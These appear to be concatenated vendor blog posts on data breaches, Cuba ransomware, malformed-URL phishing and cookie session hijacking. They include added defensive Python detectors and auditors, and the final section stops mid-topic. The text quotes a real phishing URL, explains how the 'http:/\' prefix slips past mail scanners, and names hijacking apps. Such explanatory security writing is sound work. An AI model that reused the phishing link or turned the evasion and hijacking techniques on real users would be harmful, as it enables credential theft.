For a hotel chain, this was a disaster. As well as names, email addresses, phone numbers, and postal addresses, payment card data and passport numbers were also taken. Passport numbers in particular are low-hanging fruit in the world of identity theft.

The attack has not been officially attributed, but press reporting has pointed to Chinese state intelligence. Marriott has faced a number of class-action lawsuits over the breach and a regulatory fine in the UK.

Data Breaches That Caused Identity Theft #2: Capital One

Capital One Firewall Exploit

In July 2019, Capital One announced that they had undergone a massive data breach thanks to the actions of one hacker.

Months earlier, a Seattle software engineer named Paige Thompson, a former Amazon Web Services employee, had exploited a misconfigured web application firewall in front of Capital One’s cloud infrastructure, used it to obtain credentials for a cloud role, and pulled data from Capital One’s storage. She took the records of about 106 million people in the United States and Canada, including around 140,000 Social Security numbers, which are the keys to identity fraud in the US.

Thompson did not sell the data; she posted it to a GitHub account and discussed the intrusion on Slack and Twitter. The data does not appear to have been widely misused since, so many of those affected may not be aware that somebody else had their information.

Thompson’s downfall was her hubris. After taking the data, she bragged about the intrusion online, and a GitHub user who saw the posted data reported it to Capital One through the company’s responsible disclosure program. A common misconception is that the hacking community is mostly criminals; here it was a member of that community who exposed her. She was swiftly arrested.

Capital One has been criticized for its response to the attack and for the misconfiguration that made it possible; in 2020 the Office of the Comptroller of the Currency fined the bank $80 million for failing to secure its cloud environment. It is also involved in lawsuits, as are Amazon and GitHub, who are accused of having known about the problem and failing to act on it.

Data Breaches That Caused Identity Theft #1: Equifax

Equifax Data Breach

The Equifax breach is probably the best-known of all data breaches to have occurred. The personal, financial, and political fallout from the Equifax breach has been staggering.

Equifax is a credit reporting bureau that assesses the financial health of nearly every individual across the US. In 2017, poor security practices led to the data of roughly 147 million Americans being stolen, along with the personal information of about 15 million British citizens.

Several failures on Equifax’s part made the attack possible. The attackers first exploited a vulnerability in the Apache Struts framework behind a consumer web portal (CVE-2017-5638); a patch had been available for months, but the company had not applied it. From there the attackers were able to move freely across Equifax’s servers, another security flaw, since the network had not been properly segmented. Finally, a certificate on the device that inspected encrypted network traffic had been left expired for months, so the attackers could pull data out undetected.

When Equifax realized it had been breached, it did not report it for several weeks. Sales of Equifax stock by executives before the announcement led to speculation about insider trading, and one executive was later convicted of it.

The data stolen included nearly everything you could know about someone – name, address, email, phone number, social security number, credit card number, even their driver’s license number.

The identity theft fallout from Equifax is not what you’d expect. After the incident, many in the information security community watched the dark web for bulk dumps of the data appearing for sale. That never really happened: there was a trickle of data, but never any large drop. The records of the roughly 147 million victims never hit the market as expected.

This pointed to a possible culprit: state-sponsored hackers. Sure enough, in a rare move, the Department of Justice charged four members of the Chinese People’s Liberation Army in early 2020. This is considered rare because foreign military intelligence officers are seldom charged criminally.

This has brought about a theory that the Chinese military was not all too interested in selling the data but perhaps were using it for espionage. It is unknown what the Chinese military would do with 150 million social security numbers, but perhaps the story is not fully told yet.

What you can do to Prevent Identity Theft

In the above cases, the individuals whose information leaked were not at fault; it was the corporations that were held responsible.

These are cases of large-scale data breaches, but every-day identity theft occurs most often on a personal scale.

Phishing attacks, Spyware, and Botnets are all used against us daily to uncover our details, and most of us do not have adequate protection.

SaferNet was engineered with threats like identity-theft in mind.


Cuba Ransomware Gang Set to Continue Attacks Against US Local Government for the Duration of 2021

Ransomware is a lucrative business. While it once targeted mostly consumers, in the last decade ransomware has turned its sights on the business, financial, and government sectors. Though ever-evolving in complexity, the idea behind it is simple. A computer or phone is infected with ransomware, and the files on the device are encrypted. The user sees a message on the screen from the attacker stating that their files have been locked and that a sum of money must be paid for everything to be decrypted.

It is most common for just files to be encrypted, but other types of Ransomware have been known to lock down entire operating systems.

Cuba ransomware was first sighted in late 2019 after infecting a number of individual machines. These incidents were not widely reported, as they seemed to be isolated. It’s now thought the individuals behind it, known as the Cuba Ransomware Gang or just ‘Cuba Gang’, were practicing and dipping their toes into the world of cybercrime.

Throughout 2020, Cuba ransomware was reported on several systems, though none major. However, the volume of reports prompted cybersecurity researchers to publish analyses of the exact nature of the attacks.

Cuba Gang were marked as a potential major threat actor, and in February 2021 they lived up to that reputation.

On February 4th, Cuba Gang attacked Automatic Funds Transfer Services (AFTS), a billing and payment processor based in Seattle. AFTS works with a number of local, municipal and state government entities in Washington state and across the United States.

Given AFTS’s reach, it’s no surprise how many entities have been affected. AFTS refused to pay the ransom, and so Cuba Gang promptly published the stolen data on its dark web site and offered it for sale.

For most cities using AFTS, the breach is not as destructive as it could have been. It is understood that no Social Security numbers were in the affected files; however, names, billing account numbers, addresses, and other categories of personal information were. Within Washington, citizens of the following cities are affected:

  • Seattle
  • Kirkland
  • Monroe
  • Lynnwood
  • Lakewood
  • Everett

The most notable victim is the California Department of Motor Vehicles, which used AFTS. It is believed that up to 38 million records of citizens’ vehicle registration details may have been exposed, and that these are now being offered online for the purposes of identity theft.

The data exposed from the breach includes names, addresses, phone numbers, license plate numbers, VINs, credit card information, scanned paper checks, and billing details.

At the time of writing, the attack is still ongoing, and more cities are finding themselves affected. The AFTS website is currently unavailable, and authorities including the FBI are investigating the incident.

The Nature of Cuba Ransomware

Cuba targets only Windows devices, but it runs on every Windows version from Windows XP to Windows 10, meaning it can hit both the legacy server systems that many industrial institutions still use and the most modern machines.

cuba ransomware
The ransom note shown to users with infected devices

Once inside, the ransomware encrypts files and appends the .cuba extension, e.g. picture.jpg becomes picture.jpg.cuba. The victim cannot open these files while they are in this encrypted state.

The victim is instructed via a text ransom note, opened in Notepad, that to decrypt their files they must contact a ProtonMail-based address to arrange the ransom: a payment in exchange for the decryption key.

Cuba Gang also steals copies of the data before encrypting it. If the ransom is not paid, the stolen files are published on the gang’s website on the dark web, where they are offered for sale. This ‘double extortion’ means that even a victim with good backups is still under pressure to pay.
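The behaviour described above, files gaining a ransom extension in bulk and a note dropped in every directory, is also what a defender can detect. The following Python is an added example, not code from the original article, from Cuba Gang’s tooling or from SaferNet: it runs a simple detection over a file-event log. The log format (one JSON object per line, as an EDR or file-audit agent might emit) and the ransom-note file name README_TO_DECRYPT.txt are hypothetical and constructed here; the .cuba extension is the one the article describes.

```python
"""Detect ransomware-style mass renames and ransom-note drops in a file-event log.

Added example (not from the article or the gang's tooling). The JSON-lines
event format and the note file name are constructed assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

RANSOM_EXTENSIONS = {".cuba"}                   # extension from the article
RANSOM_NOTE_NAMES = {"README_TO_DECRYPT.txt"}   # hypothetical note name


def has_ransom_extension(path):
    """True if the file name ends with a known ransomware extension."""
    return any(path.lower().endswith(ext) for ext in RANSOM_EXTENSIONS)


def _split(path):
    """Split a Windows or POSIX path into (directory, file name)."""
    norm = path.replace("\\", "/")
    directory, _, name = norm.rpartition("/")
    return directory, name


def detect_ransomware(lines, window=timedelta(seconds=60), threshold=20):
    """Return {host: reason} for hosts whose events look like encryption.

    Two signals: (1) at least `threshold` files renamed to a ransom extension
    within `window` on one host; (2) a ransom note created in 3+ directories.
    """
    renames = defaultdict(list)    # host -> timestamps of suspicious renames
    note_dirs = defaultdict(set)   # host -> directories containing a note
    for line in lines:
        ev = json.loads(line)
        host, ts = ev["host"], datetime.fromisoformat(ev["ts"])
        if ev["op"] == "rename":
            # Only count renames that ADD the extension; a user renaming an
            # already-encrypted file is not new encryption activity.
            if has_ransom_extension(ev["dst"]) and not has_ransom_extension(ev["src"]):
                renames[host].append(ts)
        elif ev["op"] == "create":
            directory, name = _split(ev["path"])
            if name in RANSOM_NOTE_NAMES:
                note_dirs[host].add(directory)

    alerts = {}
    for host, stamps in renames.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):          # sliding time window
            while stamps[start] < t - window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                secs = int(window.total_seconds())
                alerts[host] = f"{count} files renamed to a ransom extension within {secs}s"
                break
    for host, dirs in note_dirs.items():
        if len(dirs) >= 3:
            alerts.setdefault(host, f"ransom note dropped in {len(dirs)} directories")
    return alerts


def make_sample_log():
    """Constructed sample events: one infected host, one benign rename,
    one host with a single stray note (a user copying a sample)."""
    base = datetime(2021, 2, 4, 9, 0, 0)
    events = []
    for i in range(25):                            # ws-17: encryption burst
        src = f"C:\\Users\\kim\\Documents\\report{i}.docx"
        events.append({"ts": (base + timedelta(seconds=i)).isoformat(),
                       "host": "ws-17", "op": "rename", "src": src, "dst": src + ".cuba"})
    for d in ("Documents", "Pictures", "Desktop", "Downloads"):
        events.append({"ts": (base + timedelta(seconds=30)).isoformat(), "host": "ws-17",
                       "op": "create", "path": f"C:\\Users\\kim\\{d}\\README_TO_DECRYPT.txt"})
    events.append({"ts": (base + timedelta(seconds=5)).isoformat(), "host": "ws-03",
                   "op": "rename", "src": "C:\\Users\\lee\\report.docx",
                   "dst": "C:\\Users\\lee\\report_v2.docx"})
    events.append({"ts": (base + timedelta(seconds=40)).isoformat(), "host": "ws-09",
                   "op": "create", "path": "/home/sam/samples/README_TO_DECRYPT.txt"})
    return [json.dumps(e) for e in events]


SAMPLE_LOG = make_sample_log()

if __name__ == "__main__":
    for host, reason in detect_ransomware(SAMPLE_LOG).items():
        print(f"ALERT {host}: {reason}")
```

Two design points worth copying: count only renames that newly add the extension, so cleanup activity after an incident does not re-trigger, and treat the note drop as an independent signal, because a variant with a different extension still has to leave the victim instructions somewhere.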

cuba ransomware
Cuba Gang’s homepage on the Dark Web as seen using the Tor Browser

cuba ransomware
AFTS files for sale on Cuba Gang’s site

The identities of the people behind Cuba Gang are unknown. The gang may have no affiliation with the country of Cuba; the name and website design could easily be a red herring.

The full scale of this attack has not yet been revealed, but what is clear is that Cuba Gang have gone from small-time crooks to large-scale criminals. Given the success of their attack on AFTS, it is likely they will continue this campaign against US local governments for the duration of 2021.

The Genesis of the Attack

cuba ransomware
In the modern era of Software-as-a-Service and Gaming-as-a-Service, you would be correct to assume that malware has followed the trend too. Malware-as-a-Service (MaaS) has led to a tidal wave of cyberattacks on the web in recent years.

No longer do hackers need to have extreme levels of technological literacy to start a campaign; instead, they can purchase or rent Malware on the dark web and begin in earnest.

Cybersecurity researchers have reported that Cuba is a product of MaaS, being based on the Buran ransomware family.

Buran surfaced on a Russian-language dark web forum in early 2019, named after the Buran-class orbiters developed by the Soviet space program.

Buran is sophisticated ransomware known for its high speed and ability to easily bypass defenses and burrow into Windows system directories.

Before the advent of Buran, the MaaS space was dominated by big hitters such as REvil, GandCrab, and Phobos. These worked on a commission basis, with affiliates paying as much as 40% of their take back to the developers.

Buran started a price war in the scene, offering rates of 15-25% depending on the volume of attacks.

Many ransomware clients have used the Buran core. It’s possible that if Cuba Gang continues their efforts throughout the year, they could be its most infamous user.

How You Can Stay Protected Against Ransomware

cuba ransomware
In the world of Malware-as-a-Service, where just about anybody can get their hands on deadly digital tools, preparation is key.

2021 has started on ominous footing for the cybersecurity world and arming yourself, or your business with the right defensive tools against threats like ransomware now is the secret to that preparation.

SaferNet was created as a way to defend against the threats of today and those of tomorrow.




Phishing Attacks Up 6000% As Hackers Turn to Malformed URLs

Phishing attacks have long been the bane of consumer households, and in recent years have shifted their focus to small and medium businesses (SMBs). The number of phishing attacks rose notably at the start of the pandemic, when many employees began working from home. That increase has since been overshadowed: a new report by GreatHorn reveals that phishing attacks using one particular technique are up nearly 6000% since October 2020. The increase is tied to a variation in the attack vector used by phishers: malformed URLs.

Many SMBs train their employees to look for signs of phishing in suspect emails. One of the most obvious is typosquatting, a ubiquitous technique in which a criminal registers a misspelling of a brand-name domain in the hope that the victim won’t notice, for example “facebaok.com” instead of “facebook.com.”

Sometimes an attacker simply ‘sits’ on such a domain, hoping someone will mistype their way onto the site. More commonly, it is used within a phishing email. People don’t always closely scrutinize the URLs in an email they receive and often fall for the trick. As mentioned, this practice is reasonably well known and not as successful as it once was.

The natural evolution of this and the vector that has caused such a staggering increase in phishing attacks is Malformed URLs.

Usually, a website served over TLS shows “https://” in its address, and a site without it shows “http://”. In a malformed URL, the prefix looks something like “http:/\”, a forward slash followed by a backslash instead of the usual two forward slashes. The link still works: for http and https URLs, browsers treat a backslash as a forward slash, so the page loads exactly as if the URL were well formed.

While it may seem obvious written in this format, there are a couple of reasons why it’s so successful.

How Malformed URL Phishing Emails Trick Victims

Phishing

With any form of attack via email, the first and arguably largest obstacle the attacker has to get past is the email service itself. Many reputable providers such as Outlook have built-in security features to ensure their users either don’t receive a malicious email or that it lands in spam or junk.

These features scan the URLs in an incoming message for suspicious elements and either reject the email entirely or mark it as spam.

Malformed URLs slipped straight past these scans. The scanners compare the domain in each link against lists of “known bad” domains and conditions, but the link-extraction rules that feed them expect a well-formed “http://” or “https://” prefix. A link beginning “http:/\” is never recognized as a URL at all, so its domain is never checked; the scheme and delimiter preceding the domain are simply not examined.

The second hurdle an attacker must clear is less easily defined and much less tangible: the suspicion of the victim and how well they can eyeball URLs. The human brain is a pattern-matching machine, and among its quirks is perceiving things that aren’t there or are inaccurate. Our peripheral vision readily fills in the pattern of whatever is in our direct line of sight.

This can be seen most clearly in uniformity illusions, and it applies to reading, in this case reading a URL. If we quickly scan a URL looking for typosquatting, our peripheral vision will rarely spot “http:/\” unless we deliberately look for it.
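The scanner gap and the browser behaviour described in the last few paragraphs can be shown in a few lines. The Python below is an added example, not code from GreatHorn’s report, from any email security product or from the original article: a naive link extractor of the kind that feeds a known-bad-domain list, a browser-style normalizer, and a hardened check that both normalizes and flags the malformed delimiter itself. The email bodies, the domain voicemail-notice.example and the blocklist are constructed for the example; the only real-world detail is the “http:/\” prefix.

```python
"""Why "http:/\\" evades naive link scanners, and how to catch it.

Added example (not from GreatHorn's report or the article). Sample email
bodies, domains and the blocklist are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Naive extractor, modelled on rules that only recognize a well-formed
# scheme followed by exactly "//". Anything else is simply not a link to it.
NAIVE_LINK = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Tolerant extractor: any run of slashes and/or backslashes after the scheme,
# which is what browsers accept for http(s) URLs. Stops at whitespace/quotes.
FULL_LINK = re.compile(r"""https?:[/\\]+[^\s"'<>]+""", re.IGNORECASE)


def naive_scan(body, blocklist):
    """Blocklisted domains a naive scanner would find in an email body."""
    found = {d.lower() for d in NAIVE_LINK.findall(body)}
    return sorted(found & blocklist)


def browser_normalize(url):
    """Normalize an http(s) URL as browsers do: for these 'special' schemes the
    WHATWG URL standard treats a backslash as a forward slash, which is why
    "http:/\\evil.example" still loads evil.example."""
    m = re.match(r"^(https?):([/\\]+)(.*)$", url, re.IGNORECASE | re.DOTALL)
    if not m:
        return url
    scheme, _delims, rest = m.groups()
    # The authority ends at the first slash, backslash, '?' or '#'.
    authority = re.split(r"[/\\?#]", rest, maxsplit=1)[0]
    path = rest[len(authority):].replace("\\", "/")
    return f"{scheme.lower()}://{authority.lower()}{path}"


def hardened_scan(body, blocklist):
    """Every link a browser would follow, normalized and checked. The malformed
    delimiter is reported on its own: legitimate senders never write "http:/\\",
    so it is a signal even when the domain is not yet on any list."""
    findings = []
    for m in FULL_LINK.finditer(body):
        raw = m.group(0)
        delims = re.match(r"https?:([/\\]+)", raw, re.IGNORECASE).group(1)
        host = urlsplit(browser_normalize(raw)).hostname or ""
        findings.append({
            "url": raw,
            "host": host,
            "malformed": delims != "//",
            "blocklisted": host in blocklist,
        })
    return findings


def verdict(body, blocklist):
    """'block' if any link is malformed or points at a blocklisted host."""
    hits = hardened_scan(body, blocklist)
    return "block" if any(f["malformed"] or f["blocklisted"] for f in hits) else "allow"


# Constructed sample messages (not real emails); the phish mimics a voicemail
# notification, as in the campaign the article describes.
PHISH_BODY = (
    "You have a new voice message.\n"
    '<a href="http:/\\voicemail-notice.example//play?id=1831">Listen now</a>\n'
)
BENIGN_BODY = 'Agenda: <a href="https://intranet.example/meetings/42">see here</a>'
BLOCKLIST = {"voicemail-notice.example"}

if __name__ == "__main__":
    print("naive scanner sees:", naive_scan(PHISH_BODY, BLOCKLIST))      # nothing
    print("hardened scanner:", hardened_scan(PHISH_BODY, BLOCKLIST))
    print("verdict:", verdict(PHISH_BODY, BLOCKLIST))
```

The point of `browser_normalize` is that the check must see the URL the way the browser will resolve it, not the way it appears in the message; any filter that parses links with a stricter grammar than the browser’s has a bypass by construction.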

What The Attacks Look Like

GreatHorn’s report states that, across the board, SMBs running Microsoft Office 365 saw these attacks at a much higher rate than those running other email services.

While many competitors are catching up, Office 365 remains the dominant email provider for SMBs, and so these attacks are widespread.

GreatHorn provided an example of one such attack. The URL used was “http:/\brent.johnson.australiasnationalskincheckday.org.au//exr/[email protected]”. This specific phishing attempt impersonates a voicemail service, telling the recipient that they have a new voice message, and mimics the appearance and behavior of the cloud-based voicemail notifications that many email platforms send.

Phishing

Part of the phishing email, with the button linking to the malformed URL, which many users would not pick up on

Following the link brings the user to a fake ‘Office 365’ page, which first presents a reCAPTCHA, a common security feature of legitimate websites. This shows the sophistication and subtlety of the attack, and it has a practical purpose too: automated URL scanners cannot get past the CAPTCHA to see the credential-harvesting page behind it.

Next, the user is presented with a high-fidelity replica of the Office 365 login. Their email address is already filled in, and they are prompted for a password. Entering it hands the attacker a complete set of login credentials. At this point the attacker has a free pass: access to the recipient’s mailbox and contact lists, other sensitive data including cloud storage, and a trusted account from which to phish the victim’s colleagues.

The Challenge of Phishing Attacks for SMBs

Phishing is relatively simple for a cybercriminal to carry out: set up the page, write the email, and send it out en masse. This ease has made phishing the go-to attack method for targeting SMBs.

At the end of last year, Proofpoint published a report on the state of phishing attacks against SMBs in 2020. The results were troubling: 75% of SMBs faced phishing attacks during the year, and 57% experienced at least one successful attack.

Many of these were spear phishing and whaling attacks: targeted attacks against managers and C-level executives at a business.

Phishing is without doubt one of the great threats any SMB must deal with. Beyond educating employees, enforcing multi-factor authentication on email accounts (so that a stolen password alone is not enough to log in) and performing regular internal security audits, employers should equip themselves with the right tools to combat phishing.

SaferNet is one of these tools, which we engineered with attacks like Phishing in mind.


Poisoned Cookies: 5 Notable Attack Vectors For Session Hijacking Using Cookies

Cookies; a childhood delight for many, a fondness that continued throughout life. When you say the word, you think of one thing – sugary treats. Otherwise, most of us are aware that cookies in the digital world are present but don’t really understand what they do. Most of our interactions with cookies online come from visiting media sites that prompt us to accept cookies. However, cookies and their use online are an important underpinning of the worldwide web, and their functionality has changed throughout the years. Many technologies associated with the internet are used for nefarious purposes, and cookies are no different.

Cookies are small pieces of data that a website sends to your browser, which stores them and sends them back with every later request to that site. A cookie holds a small amount of data relevant to you, the user, and the website you visited: typically a session identifier or token, plus preferences. A well-designed site never puts your password in a cookie. For example, when you return to a social media site, it reads the cookies it previously set, recognizes you at that stage, and tailors the page for you.

This mostly consists of automatic logins and loading social feeds, but it has some other purposes many don’t realize. A shopping cart on any e-commerce website relies on cookies. Google Maps greatly relies on cookies too. Cookies shape our personalized experience of the web.

Cookies that outlive the browser session are called persistent cookies: the server gives them an Expires or Max-Age attribute, and the browser keeps them on disk until that time. These are what keep you logged in across browser restarts. (A browser password manager, such as Chrome’s, stores your passwords separately, not in cookies.) It is good practice to clear persistent cookies periodically, especially on a shared machine.

When you were younger (and maybe even now), you didn’t want anybody stealing from your cookie jar. With online cookies, it’s not a great feeling either. Stealing from the digital cookie jar has several names: cookie poisoning, cookie hijacking, and most commonly session hijacking.

Session Hijacking is rampant. Think of every single website you sign into. It is very likely that one or more is vulnerable to session hijacking. A number of years ago, a report stated that 31% of all e-commerce sites were vulnerable to session hijacking, and it’s only gotten worse. So how does it work?

When you log in to a website, the server sets a session cookie in your browser. That cookie is the only thing the site uses afterwards to know that you are who you claim to be: whoever presents it is treated as you. This is where a man-in-the-middle (MITM) comes in. If any part of your traffic to the site travels unencrypted, an attacker on the same network can read the cookie and copy its session ID. With that ID the attacker can connect to the site, present your cookie, and be treated by the server as you. No password is needed, and the server cannot tell the two of you apart.
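The following is an added example, not code from the original article, that models the point above: a session cookie is a bearer token, so a copied cookie is as good as the original. The toy server, its signing key, the `SessionServer`, `login`, `whoami` and `logout` names and the "correct-horse-battery-staple" credential are all constructed for this example and are not any real framework's API. It also shows what signing a cookie does and does not buy you: it stops forgery and tampering (cookie poisoning) but does nothing against replay of a cookie the server genuinely issued.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed server-side signing key for this example; a real deployment
# loads it from a secret store and never sends it to the client.
SIGNING_KEY = b"example-signing-key-do-not-reuse"


class SessionServer:
    """Toy server: issues signed session cookies and looks them up."""

    def __init__(self) -> None:
        # Server-side state: session id -> username. The cookie only carries
        # the id, so revoking a session here kills every copy of the cookie.
        self._sessions: Dict[str, str] = {}

    def _sign(self, session_id: str) -> str:
        return hmac.new(SIGNING_KEY, session_id.encode(), hashlib.sha256).hexdigest()

    def login(self, username: str, password: str) -> Optional[str]:
        """Return a cookie value 'id.signature', or None on bad credentials."""
        # Constructed credential check; a real server verifies a password hash.
        if password != "correct-horse-battery-staple":
            return None
        session_id = secrets.token_urlsafe(32)  # never contains '.'
        self._sessions[session_id] = username
        return f"{session_id}.{self._sign(session_id)}"

    def whoami(self, cookie: str) -> Optional[str]:
        """Who does the server believe is presenting this cookie?"""
        session_id, sep, signature = cookie.rpartition(".")
        if not sep:
            return None
        if not hmac.compare_digest(signature, self._sign(session_id)):
            return None  # forged or tampered: the signature does not match
        # Valid signature: the server trusts whoever holds the cookie.
        return self._sessions.get(session_id)  # None once revoked

    def logout(self, cookie: str) -> None:
        self._sessions.pop(cookie.rpartition(".")[0], None)


def demo() -> Dict[str, Optional[str]]:
    """Run the four cases discussed in the text and return what the server saw."""
    server = SessionServer()
    victim_cookie = server.login("alice", "correct-horse-battery-staple")
    assert victim_cookie is not None

    # 1. Replay: an attacker who sniffed the cookie presents it unchanged.
    replayed = server.whoami(victim_cookie)

    # 2. Forgery: an attacker invents an id without knowing the key.
    forged = server.whoami("0000000000.deadbeef")

    # 3. Poisoning: the attacker edits the id but cannot re-sign it.
    session_id, signature = victim_cookie.rsplit(".", 1)
    flipped = "A" if session_id[-1] != "A" else "B"
    tampered = server.whoami(session_id[:-1] + flipped + "." + signature)

    # 4. Revocation: once the victim logs out, the stolen copy is dead too.
    server.logout(victim_cookie)
    after_logout = server.whoami(victim_cookie)

    return {"replayed": replayed, "forged": forged,
            "tampered": tampered, "after_logout": after_logout}


if __name__ == "__main__":
    print(demo())
```

The replayed cookie resolves to "alice" while the forged and tampered ones are rejected; only server-side revocation (logout, or an expiry enforced in the session table) invalidates the stolen copy. That is why a site cannot fix hijacking by signing cookies harder: it has to stop the cookie being observed in the first place.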

When the hacker is in, they can do anything that you’re authorized to do on the website. This includes purchasing items, stealing company information, starting money transfers from your bank account, and stealing information that can be used for identity theft.

For large enterprises that use a single sign-on (SSO) system, this can be devastating: one hijacked session can open financial records, company documents and every other application that trusts the SSO session.

The two most common versions of these attacks involve Session Sniffing and Cross-Site Scripting (XSS).

Session sniffing occurs when an attacker runs a packet sniffer (often a perfectly legitimate network tool) and records all the traffic on the network. If a site's cookies travel in the clear, they are in that traffic, and the sniffer is set up to pick them out. Session sniffing is most common on public Wi-Fi: coffee shops, airports, universities, city hotspots and so on.

XSS takes a more complex approach but can net far more victims. XSS has many uses beyond session hijacking, but as a general rule it occurs when an attacker injects script into a vulnerable website. When a user visits the page, their browser runs the script, because it arrived from the site's own origin and is trusted like any other script on the page. For session hijacking, the injected script reads the user's cookies through document.cookie (unless the cookie was set with the HttpOnly flag, which blocks script access) and sends them to the attacker. This way a single compromised popular site can harvest thousands of session IDs from users as they log in.
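The two attacks above (sniffing and XSS) map onto two cookie attributes: Secure keeps a cookie off plain HTTP where a sniffer could read it, and HttpOnly keeps it out of reach of injected script. The following added example, which is not part of the original article, audits Set-Cookie headers for those attributes plus SameSite and an unnecessary expiry. The parser and the `SAMPLE_HEADERS` are constructed for this example; the attribute rules are the standard ones.

```python
from typing import Dict, List, Tuple


def parse_set_cookie(header: str) -> Dict[str, str]:
    """Split 'name=value; Attr; Attr=val' into a dict.

    'name' and 'value' hold the cookie itself; every attribute is stored under
    its lowercased name, with '' as the value for flag attributes such as
    Secure and HttpOnly.
    """
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = {"name": name.strip(), "value": value.strip()}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        cookie[key.strip().lower()] = val.strip()
    return cookie


def audit_cookie(header: str, is_session_cookie: bool = True) -> List[str]:
    """Return the list of weaknesses found; an empty list means none."""
    c = parse_set_cookie(header)
    findings = []
    if "secure" not in c:
        findings.append("missing Secure: the browser will also send it over plain HTTP, where a sniffer can read it")
    if "httponly" not in c:
        findings.append("missing HttpOnly: injected script (XSS) can read it via document.cookie")
    if c.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: sent along with cross-site requests")
    if is_session_cookie and ("expires" in c or "max-age" in c):
        findings.append("persistent session cookie: survives closing the browser, widening the theft window")
    return findings


# Constructed sample headers for this example.
SAMPLE_HEADERS = [
    "sessionid=a1b2c3d4; Path=/",
    "sessionid=a1b2c3d4; Path=/; Secure; HttpOnly; SameSite=Lax",
    "remember_me=r5t6y7; Path=/; Expires=Fri, 31 Dec 2021 23:59:59 GMT; Secure; HttpOnly; SameSite=Strict",
]


def audit_all(headers: List[str]) -> List[Tuple[str, List[str]]]:
    """Audit every Set-Cookie header and pair each cookie name with its findings."""
    return [(parse_set_cookie(h)["name"], audit_cookie(h)) for h in headers]


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS):
        print(name, "->", findings or "OK")
```

The first sample header, a bare session cookie, fails all three attribute checks; the second passes; the third is a deliberately persistent "remember me" cookie, so the only finding is its lifetime. Run it against the headers of your own login response (curl -I will show them) to see which of the attacks in this article the site is exposed to.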

If any of this sounds complicated to perform, it isn't. Session hijacking has been called "hacking for dummies", and a simple Google or YouTube search turns up step-by-step guides. There are exceptions, of course: some methods are notably complex, which in turn makes them more effective.

Session Hijacking Attacks Using Cookies #5: WordPress XSS Exploits

 


WordPress evolved from a beginner's tool for web development into the de facto name in the industry. While still exceptionally user-friendly, seasoned users have built beautifully written websites on it using complex methods. Systems with a low barrier to entry but a high skill ceiling are often popular ones, and WordPress is no exception.

One of WordPress's most popular features is its community-created modules, namely themes and plugins.

Themes give a website its look and feel. This covers everything from colour scheme to image placement, blog post listings and general layout. Themes are the skeletal structure of a WordPress website.

Plugins, on the other hand, are not so easily defined. A plugin can be anything created by the community to augment your website: a contact form, an image slider, a Google Analytics integration, a drag-and-drop page builder, and more. As of 2020, there were 70,000 different plugins available for WordPress.

Community curated systems like these can be amazing, but they’re easily abused, especially when it comes to session hijacking.

OneTone was a popular WordPress theme several years ago but has since been discontinued. It remained in use after development stopped, which made it an attractive target: its original developers no longer supported it, so nothing would be patched. A vulnerability in the theme's functions.php file allowed an attacker to inject malicious code into the site. When the site administrator visited the page, they were redirected to the attacker's own domain, where their cookies could be read. Even after the administrator had cleaned up the infection, the attacker still held those cookies, which served as a backdoor for later unauthorised entries.

A more recent and much more severe attack came last year. Ninja Forms is a popular plugin that lets an administrator add forms to their site. A legacy version of the plugin was hit with XSS. When an administrator used the form, the injected code executed in their browser and their cookies were stolen. As with OneTone, this gave the attacker administrator access to the WordPress site. Infected sites would also redirect visitors to malicious websites that attempted various attacks on anyone who was unprotected.

Session Hijacking Attacks Using Cookies #4: FaceNiff

 


FaceNiff was one of the first popular Android-based session hijackers to hit the mobile market. Google Play does not allow malicious apps on its store, so the .apk that makes up the application has to be found elsewhere on the internet. It also requires the attacker to have rooted their Android device.

When opened, FaceNiff scans its network using session sniffing. Initially it only looked for Facebook logins, but the app later branched out to include YouTube, Amazon and others.

FaceNiff is usually used on public Wi-Fi. Once it detects a Facebook (or other) session ID it does the heavy lifting itself: the captured sessions appear as a list of accounts, and tapping one opens that account as the victim. No email address or password is involved; the stolen cookie is the proof of identity, which is the whole point.

Apps like FaceNiff are extremely easy to get and to use. When we think of hacking on public Wi-Fi we tend to picture a man with his hood up, hunched over a laptop in a coffee shop. That image is somewhat dangerous because it conceals the reality: a FaceNiff user is more likely an ordinary-looking person sitting at an airport gate on their phone, just like everybody else.

Session Hijacking Attacks Using Cookies #3: FireSheep

 


FireSheep actually predates FaceNiff, and did the same job from a laptop.

Released in October 2010 as an extension for the Firefox browser, FireSheep listened on the local network and listed the Facebook (and other) sessions it saw in a sidebar. A FireSheep user simply double-clicked a name and was logged into that person's account.

FireSheep was written to demonstrate the dangers of public Wi-Fi, and of sites that used HTTPS only for the login page and then sent the session cookie in the clear on every later request. It was an educational proof of concept, but it was also a finished tool that anyone could install.

FireSheep required no rooting and no special knowledge; you only had to run Firefox. It was mass-adopted by would-be hackers and led to many compromised accounts. Its lasting effect was to push Facebook, Twitter and other large sites to serve whole sessions over HTTPS, which is what finally neutralised it.

Session Hijacking Attacks Using Cookies #2: DroidSheep

 


DroidSheep was developed with the best of intentions. On an industry level it lets companies test the security of their networks and websites. However, given its ease of use, it overtook FaceNiff as the go-to mobile hijacker.

Like FaceNiff, DroidSheep must be downloaded from the developer's website onto a rooted Android device. It is more user-friendly than its predecessor and offers more functionality: it captures cookies for any website rather than a fixed list, so it is not limited in targets, and it can also run a number of Linux commands.

While it is prevalent among hackers, it would be misleading not to mention that DroidSheep's developers knew this could be a problem. Alongside DroidSheep they released DroidSheep Guard, an app that detects and blocks the kind of sniffing the main app performs. DroidSheep Guard is useful, but it does not protect the user against every other sniffing application.

Session Hijacking Attacks Using Cookies #1: Pass-The-Cookie

 


As session hijacking became more popular, so did methods of defending against it. One such method that most people know today is two-factor authentication (2FA).

2FA asks for a second proof at login beyond the password: usually a one-time code, either sent by text message to your phone or generated on the device by an authenticator app such as Google Authenticator. 2FA is a step in the right direction for every account that offers it and should be set up immediately.

